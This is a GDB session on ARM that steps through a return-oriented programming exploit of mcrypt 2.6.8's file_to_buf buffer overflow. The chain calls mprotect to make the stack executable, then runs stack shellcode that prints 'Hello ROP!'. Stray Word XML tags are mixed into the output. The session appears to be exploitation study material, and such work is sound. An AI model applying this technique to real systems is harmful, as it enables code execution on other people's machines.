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pi@raspberrypi:~/Desktop/hpconarm/exploits/mcrypt-2.6.8/src $ gdb --args ./mcrypt -d cyberpunkmp.nc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gdb (Raspbian 8.2.1-2) 8.2.1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2018 Free Software Foundation, Inc.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GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;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free software: you are free to change and redistribute it.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WARRANTY, to the extent permitted by law.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"show copying" and "show warranty" for details.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GDB was configured as "arm-linux-gnueabihf".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"show configuration" for configuration details.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bug reporting instructions, please see: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&lt;http://www.gnu.org/software/gdb/bugs/&gt;.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GDB manual and other documentation resources online at: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&lt;http://www.gnu.org/software/gdb/documentation/&gt;.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help, type "help".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"apropos word" to search for commands related to "word"...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 symbols from ./mcrypt...done.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(gdb) b *0x00019080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Breakpoint 1 at 0x19080: file rfc2440.c, line 126.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(gdb) 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program: /home/pi/Desktop/hpconarm/exploits/mcrypt-2.6.8/src/mcrypt -d cyberpunkmp.nc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Breakpoint 1, 0x00019080 in file_to_buf (file=&lt;optimized out&gt;, ret_len=0xaabbcc1d, offset=0)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 rfc2440.c:126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    return buf;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(gdb) i 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r0             0x0                 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             0x0                 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             0x30494             197780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r3             0x76f73eec          1995914988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r4             0xaabbcc1a          2864434202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r5             0xaabbcc1b          2864434203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r6             0xaabbcc1c          2864434204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r7             0xaabbcc1d          2864434205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r8             0xaabbcc1e          2864434206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r9             0x58ed0             364240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r10            0x594f8             365816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r11            0x1                 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r12            0x76f7408c          1995915404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            0x7effeb98          0x7effeb98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             0x1454c             83276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             0x19080             0x19080 &lt;file_to_buf+152&gt;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cpsr           0x60000010          1610612752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fpscr          0x0                 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(gdb) si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0x00011a60 in _init ()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(gdb) i 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r0             0x0                 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             0x0                 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             0x30494             197780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r3             0x76f73eec          1995914988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r4             0x41414141          1094795585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r5             0x41414141          1094795585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r6             0x31000             200704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r7             0x7efdf000          2130571264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r8             0x21000             135168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r9             0x7                 7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r10            0x594f8             365816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r11            0x1                 1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r12            0x76f7408c          1995915404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            0x7effebb4          0x7effebb4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             0x1454c             83276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             0x11a60             0x11a60 &lt;_init+8&gt;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cpsr           0x60000010          1610612752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fpscr          0x0                 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(gdb) si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0x0001d0a8 in __libc_csu_init ()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(gdb) i r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r0             0x0                 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             0x0                 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             0x30494             197780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r3             0x11a60             72288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r4             0x41414141          1094795585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r5             0x41414141          1094795585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r6             0x31000             200704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r7             0x7efdf000          2130571264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r8             0x21000             135168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r9             0x7                 7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r10            0x594f8             365816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r11            0x1                 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r12            0x76f7408c          1995915404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            0x7effebbc          0x7effebbc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             0x1454c             83276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             0x1d0a8             0x1d0a8 &lt;__libc_csu_init+60&gt;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cpsr           0x60000010          1610612752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fpscr          0x0                 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(gdb) si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0x0001d0ac in __libc_csu_init ()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(gdb) i r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r0             0x0                 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             0x0                 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             0x7                 7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r3             0x11a60             72288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r4             0x41414141          1094795585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r5             0x41414141          1094795585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r6             0x31000             200704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r7             0x7efdf000          2130571264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r8             0x21000             135168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r9             0x7                 7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r10            0x594f8             365816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r11            0x1                 1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r12            0x76f7408c          1995915404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            0x7effebbc          0x7effebbc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             0x1454c             83276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             0x1d0ac             0x1d0ac &lt;__libc_csu_init+64&gt;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cpsr           0x60000010          1610612752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fpscr          0x0                 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(gdb) si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0x0001d0b0 in __libc_csu_init ()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(gdb) i r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r0             0x0                 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             0x21000             135168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             0x7                 7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r3             0x11a60             72288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r4             0x41414141          1094795585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r5             0x41414141          1094795585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r6             0x31000             200704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r7             0x7efdf000          2130571264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r8             0x21000             135168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r9             0x7                 7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r10            0x594f8             365816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r11            0x1                 1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r12            0x76f7408c          1995915404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            0x7effebbc          0x7effebbc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             0x1454c             83276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             0x1d0b0             0x1d0b0 &lt;__libc_csu_init+68&gt;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cpsr           0x60000010          1610612752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fpscr          0x0                 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(gdb) si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0x0001d0b4 in __libc_csu_init ()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(gdb) i r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r0             0x7efdf000          2130571264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             0x21000             135168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             0x7                 7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r3             0x11a60             72288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r4             0x41414141          1094795585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r5             0x41414141          1094795585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r6             0x31000             200704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r7             0x7efdf000          2130571264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r8             0x21000             135168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r9             0x7                 7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r10            0x594f8             365816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r11            0x1                 1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r12            0x76f7408c          1995915404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            0x7effebbc          0x7effebbc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             0x1454c             83276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             0x1d0b4             0x1d0b4 &lt;__libc_csu_init+72&gt;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cpsr           0x60000010          1610612752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fpscr          0x0                 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(gdb) si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0x00011a60 in _init ()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(gdb) i r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r0             0x7efdf000          2130571264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             0x21000             135168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             0x7                 7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r3             0x11a60             72288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r4             0x41414141          1094795585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r5             0x41414141          1094795585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r6             0x31000             200704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r7             0x7efdf000          2130571264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r8             0x21000             135168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r9             0x7                 7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r10            0x594f8             365816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r11            0x1                 1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r12            0x76f7408c          1995915404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            0x7effebbc          0x7effebbc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             0x1d0b8             118968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             0x11a60             0x11a60 &lt;_init+8&gt;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cpsr           0x60000010          1610612752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fpscr          0x0                 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(gdb) si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0x76dd63b8 in set_binding_values (domainname=&lt;optimized out&gt;, dirnamep=&lt;optimized out&gt;,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codesetp=0x21000) at bindtextdom.c:312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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">bindtextdom.c: No such file or directory.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(gdb) i r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r0             0x7efdf000          2130571264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             0x21000             135168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             0x7                 7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r3             0x76e84db0          1994935728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r4             0x41414141          1094795585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r5             0x41414141          1094795585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r6             0x31000             200704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r7             0x7efdf000          2130571264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r8             0x21000             135168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r9             0x7                 7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r10            0x594f8             365816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r11            0x1                 1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r12            0x76f7408c          1995915404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            0x7effebc4          0x7effebc4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             0x1d0b8             118968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             0x76dd63b8          0x76dd63b8 &lt;set_binding_values+468&gt;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cpsr           0x60000010          1610612752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fpscr          0x0                 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(gdb) si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0x76dd63bc</w:t>
        <w:tab/>
        <w:t xml:space="preserve">312</w:t>
        <w:tab/>
        <w:t xml:space="preserve">in bindtextdom.c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(gdb) i r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r0             0x7efdf000          2130571264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             0x21000             135168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             0x7                 7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r3             0x76e84db0          1994935728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r4             0x41414141          1094795585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r5             0x41414141          1094795585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r6             0x41414141          1094795585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r7             0x41414141          1094795585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r8             0x41414141          1094795585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r9             0x41414141          1094795585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r10            0x41414141          1094795585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r11            0x41414141          1094795585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r12            0x76f7408c          1995915404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            0x7effebe8          0x7effebe8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             0x7effebe8          2130701288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             0x76dd63bc          0x76dd63bc &lt;set_binding_values+472&gt;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cpsr           0x60000010          1610612752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fpscr          0x0                 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(gdb) si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mprotect () at ../sysdeps/unix/syscall-template.S:78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../sysdeps/unix/syscall-template.S: No such file or directory.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(gdb) i r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r0             0x7efdf000          2130571264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             0x21000             135168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             0x7                 7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r3             0x76e84db0          1994935728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r4             0x41414141          1094795585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r5             0x41414141          1094795585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r6             0x41414141          1094795585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r7             0x41414141          1094795585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r8             0x41414141          1094795585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r9             0x41414141          1094795585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r10            0x41414141          1094795585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r11            0x41414141          1094795585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r12            0x76f7408c          1995915404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            0x7effebe8          0x7effebe8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             0x7effebe8          2130701288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             0x76e84db0          0x76e84db0 &lt;mprotect&gt;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cpsr           0x60000010          1610612752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fpscr          0x0                 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(gdb) fin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till exit from #0  mprotect () at ../sysdeps/unix/syscall-template.S:78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0x7effebe8 in ?? ()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(gdb) i r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r0             0x0                 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             0x21000             135168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             0x7                 7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r3             0x76e84db0          1994935728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r4             0x41414141          1094795585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r5             0x41414141          1094795585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r6             0x41414141          1094795585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r7             0x41414141          1094795585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r8             0x41414141          1094795585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r9             0x41414141          1094795585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r10            0x41414141          1094795585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r11            0x41414141          1094795585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r12            0x76f7408c          1995915404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            0x7effebe8          0x7effebe8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             0x7effebe8          2130701288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             0x7effebe8          0x7effebe8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cpsr           0x10                16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fpscr          0x0                 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(gdb) x/4i $pc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0x7effebe8:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">add</w:t>
        <w:tab/>
        <w:t xml:space="preserve">r0, pc, #8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0x7effebec:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ldr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">r3, [pc]</w:t>
        <w:tab/>
        <w:t xml:space="preserve">; 0x7effebf4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0x7effebf0:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">blx</w:t>
        <w:tab/>
        <w:t xml:space="preserve">r3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0x7effebf4:</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">; &lt;UNDEFINED&gt; instruction: 0x76e0f530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0x7effebec in ?? ()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(gdb) i r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r0             0x7effebf8          2130701304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             0x21000             135168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             0x7                 7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r3             0x76e84db0          1994935728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r4             0x41414141          1094795585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r5             0x41414141          1094795585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r6             0x41414141          1094795585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r7             0x41414141          1094795585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r8             0x41414141          1094795585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r9             0x41414141          1094795585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r10            0x41414141          1094795585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r11            0x41414141          1094795585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r12            0x76f7408c          1995915404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            0x7effebe8          0x7effebe8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             0x7effebe8          2130701288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             0x7effebec          0x7effebec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cpsr           0x10                16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fpscr          0x0                 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(gdb) si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0x7effebf0 in ?? ()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(gdb) i r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r0             0x7effebf8          2130701304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             0x21000             135168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             0x7                 7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r3             0x76e0f530          1994454320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r4             0x41414141          1094795585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r5             0x41414141          1094795585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r6             0x41414141          1094795585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r7             0x41414141          1094795585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r8             0x41414141          1094795585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r9             0x41414141          1094795585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r10            0x41414141          1094795585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r11            0x41414141          1094795585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r12            0x76f7408c          1995915404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            0x7effebe8          0x7effebe8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             0x7effebe8          2130701288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             0x7effebf0          0x7effebf0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cpsr           0x10                16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fpscr          0x0                 0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(gdb) si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__GI__IO_puts (str=0x7effebf8 "Hello ROP!\n") at ioputs.c:35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ioputs.c: No such file or directory.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(gdb) i r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r0             0x7effebf8          2130701304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             0x21000             135168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             0x7                 7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r3             0x76e0f530          1994454320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r4             0x41414141          1094795585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r5             0x41414141          1094795585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r6             0x41414141          1094795585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r7             0x41414141          1094795585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r8             0x41414141          1094795585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r9             0x41414141          1094795585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r10            0x41414141          1094795585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r11            0x41414141          1094795585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r12            0x76f7408c          1995915404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            0x7effebe8          0x7effebe8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             0x7effebf4          2130701300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             0x76e0f530          0x76e0f530 &lt;__GI__IO_puts&gt;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cpsr           0x10                16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fpscr          0x0                 0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(gdb) fin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till exit from #0  __GI__IO_puts (str=0x7effebf8 "Hello ROP!\n") at ioputs.c:35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 ROP!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0x7effebf4 in ?? ()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 returned is $1 = 12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